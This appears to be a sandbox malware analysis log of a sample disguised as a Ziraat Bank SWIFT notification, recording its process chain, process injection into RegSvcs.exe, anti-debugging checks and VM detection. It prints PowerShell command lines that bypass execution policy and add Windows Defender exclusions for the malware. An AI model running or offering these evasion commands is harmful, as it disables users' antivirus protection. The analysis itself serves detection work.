Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: XClient.exe, 0000000B.00000002.2554544345.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: niellist.exe, 00000011.00000002.1410876293.0000000000A67000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH_
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D76000.00000004.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772258009.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987104410.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1279607006.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1301817697.00000000004F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000010.00000002.1385129268.00000206917A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWi
Source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00473F09 BlockInput, 0_2_00473F09
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00435A7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 9_2_004019F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_005A8594 mov eax, dword ptr fs:[00000030h] 0_2_005A8594
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00AD1130 mov eax, dword ptr fs:[00000030h] 0_2_00AD1130
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B13F3D mov eax, dword ptr fs:[00000030h] 0_2_00B13F3D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00D711F0 mov eax, dword ptr fs:[00000030h] 0_2_00D711F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00D71250 mov eax, dword ptr fs:[00000030h] 0_2_00D71250
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00D6FB80 mov eax, dword ptr fs:[00000030h] 0_2_00D6FB80
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AA1130 mov eax, dword ptr fs:[00000030h] 3_2_00AA1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AE3F3D mov eax, dword ptr fs:[00000030h] 3_2_00AE3F3D
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00CEA2A0 mov eax, dword ptr fs:[00000030h] 3_2_00CEA2A0
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00CEA300 mov eax, dword ptr fs:[00000030h] 3_2_00CEA300
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00CE8C30 mov eax, dword ptr fs:[00000030h] 3_2_00CE8C30
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_00AFAE88 mov eax, dword ptr fs:[00000030h] 17_2_00AFAE88
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_00AFC4F8 mov eax, dword ptr fs:[00000030h] 17_2_00AFC4F8
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_00AFC558 mov eax, dword ptr fs:[00000030h] 17_2_00AFC558
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033C1130 mov eax, dword ptr fs:[00000030h] 17_2_033C1130
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_03403F3D mov eax, dword ptr fs:[00000030h] 17_2_03403F3D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_004580A9
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A155
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042A124 SetUnhandledExceptionFilter, 0_2_0042A124
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B11361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00B11361
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00B14C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00B14C7B
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AE1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00AE1361
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 3_2_00AE4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00AE4C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004123F1 SetUnhandledExceptionFilter, 9_2_004123F1
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_03401361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_03401361
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_03404C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_03404C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe NtClose: Indirect: 0x140077E81
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\differences\niellist.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\differences\niellist.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 941008
Source: C:\Users\user\AppData\Local\differences\niellist.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FC6008
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004587B1 LogonUserW, 0_2_004587B1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00464C53 mouse_event, 0_2_00464C53
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00457CAF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0045874B
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: 0_2_0042862B cpuid 0_2_0042862B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA, 9_2_00417A20
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\differences\niellist.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\differences\niellist.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
